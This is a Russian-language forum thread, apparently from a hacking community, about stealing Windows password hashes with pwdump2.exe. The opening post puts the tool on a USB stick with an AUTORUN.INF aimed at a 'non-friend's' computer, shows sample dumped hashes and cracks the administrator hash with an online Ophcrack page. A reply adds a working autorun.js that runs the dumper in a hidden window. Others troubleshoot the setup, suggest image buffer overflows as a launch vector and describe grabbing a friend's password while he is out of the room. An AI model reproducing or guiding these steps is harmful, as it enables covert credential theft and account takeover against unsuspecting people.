Кто то прошлой недели расказывал про RainbowCrack но как то скупо и мало. И я тоже про него ничего Вам не раскажу. Потому как таких програм уже развелось. Речь пойдёт о программе pwdump2.exe. Программка в использовании невероятно проста. Достаточно её запустить в командной строке например так : pwdump2.exe > pass.txt pass.txt анписал на случайно, потому как туда ушли хеши пользователей. На канале ачата некий BAY спрашивал зачем тырить пассы у друга (я до того описывал один способов применения, придумайте свой и напишите сдесь ). Ладно к другу идти не будем. Едём к недругу. Флешки стали в сей час очень популярны. Создаём на ней файл AUTORUN.INF (например) с таким содержимым : Code: [autorun] OPEN=pwdump2.exe > pass.txt ICON=pwdump2.exe Потом чёто там переписываем (новый альбом Бритни Спис илишто.) И без радости на лице (а то спалят) идём домой. Содержимое : Code: administrator:1003:5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914a77465923486e68::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:3d26128f74c4b110d9e1cf5872a4fd43:b5122fd690836f3950962915ecb287ce::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:cd01cba60848faf3204a0389d1ac9ef3::: VUSR_PZ1418:1004:c249e29af807bb32f6c000cbbff0ab93:19c11662fabc4372d38e06edab8c1ec5::: Наша жертва например administrator. Копируем хеш Code: 5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914a77465923486e68 и заходим на страничку : http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/ и там где пишет hash: вставляем наш хеш. Жмём Submit hash. Ждёмс около 5-10 секунд. И вот он пароль. Так же можно проверить свой пароль если ввести его в поле password:, нам выдаст хеш. Потом пробуем назад. Но єтот онлайн скрипт имеет не большую базу. А её то можно скачать по ссылкам : SSTIC04-10k (388MB), for PCs with at least 256MB of RAM SSTIC04-5k (720MB), for PCs with at least 512MB of RAM. Вообщем всё это читаете на том же сайте. Ах да. Где я взял pwdump2.exe? Если чесно то в гугле. Но если комуто тяжело искать то берите откуда брял я : http://www.doubleupsoftware.com/files/pwdump2.zip На этом и буду процатся. З.Ы. Это моя первая такого рода статья. Интересно Ваше мнение по поводу написания.
На сколько мне известно, флеш не автозапускается из авторана, как сд. И говорили об этом уже не один раз. Единственно, что из авторана считывается иконка. А иконка, это картинка. А в картинках можно организовать переполнение буфера аля WMF. Или ещё одно переполнение в .bmp Кстати, нашли ещё одну дыру в WMF, правда там только дос. Проводник или любое другое кэширующе\воспроизводящая прога красиво падает в даун И вообще. pwdump разработали в 2000 году. А в каком году ХР вышло ? Не подскажите? Будем надеется, что у другана win2000 или NT.
по тексту читаем : pwdump2.exe Работает на ХР и 2003 серваке отлично. Проверенно. А вот чесно скажу на 2000 и НТ не проверял, поскоку небыло под руками.
Ок! хрюша прошла тест Извиняюсь, просто как то не верилось, да и помнится мне старая версия дампа. Правда мой 10символьник сайт не разгодал ) Читанул сайтец. Интересная консольная альтернатива. 2003 отказалась. Но с флешкой не прокатит просто так. это 100% Неоднократно проверял. С неё и загрузить операционку трудно... Вобщем много там заморочек. Но говорю, можно заюзать фичу с картинкой. Читаем статьи лебеда про метасплоит.
грузить операционку?... эт не то.. Это автозагрузка (как с сидюка). А её мало кто выключает (но не я конечно). Так что вариант.
Юзал подобную фишку. В autorun.inf нужно написать Code: [autorun] ICON=icon.ico OPEN=wscript autorun.js ACTION=Take no action Выдрать у shell32'a иконку создать файл autorun.js Code: var WshShell = new ActiveXObject("WScript.Shell"); var oExec = WshShell.Run('cmd /C "xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe>>pass.txt"',0); И всё работает наура, только после вставки флэшки, остаётся нажать Enter, на якомы "Ничего не делать" Да, и ещё сделать их все скрытыми и системными Статья неплохая, держи +2
Предотвращение выполнения данных — Microsoft Windows LSA Shell (Export Version) Закрыть сообщение Хех... сработала защитп =) Windows XP MC 2005 рулид =) За статью + !
А у меня вот что то тема с флэшкой не канает... вроде всё сделал как hidden написал но всё равно не выходит.
Создаётся pass.txt но без хэшэй... пустой. Это если на autorun.js жать, а так флэшка сама не запускается.
xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe(G:\xxx\progs\PassRecovery\pwdump2\pwdump2.exe) - это относительный путь к этой програме на моей флешке, укажи куда ты её положил на своей флешке.
я кинул сюда F:\xxx\progs\PassRecovery\pwdump2 тоесть путь такой же как и у тебя... в прошлый раз пропустил xxx сейчас исправил, и при нажатии на autoran.js даже pass.txt не создаётся.
Тогда осталось только два варианта: 1) У тебя стоит антивирус, фаервол или ещё какаянибудь ерунда, которая успешно блокирует эту прогу. 2) У тебя что-то не так с виндой. Тем не мение, попробуй выполнить эту прогу через командную строку, если заработает, значит проблема в твоём интерпритаторе javascript'a иначе в проге.
=)))))))) Держи крестик =) А вот мой способ качаем прогу Sam Imside... Устанаваливаем на флешку... Идем к "другу"... Туды Суды... Говоришь иму поставь чайник... Или "иди поставь, Чайник!"... Вообщем штоб он уш0л... Быстро заупускаем жмем адну кнопку, быстро запомниаем пароль и выдираем фляху... Но тут входит "друг", ловким движением пальца закидываем флеху под рукав и делаем вид, мол корпус расматриваешь, в дырке USB ковыряешься -)))) =)))))))))))))))))))))))) Тока вод нахира эти пароли нужны?
Винду переустанавливал пару дней назад =) Ни фаерволов ни антивирусников ещё не ставил. Через командную строку всё работает.
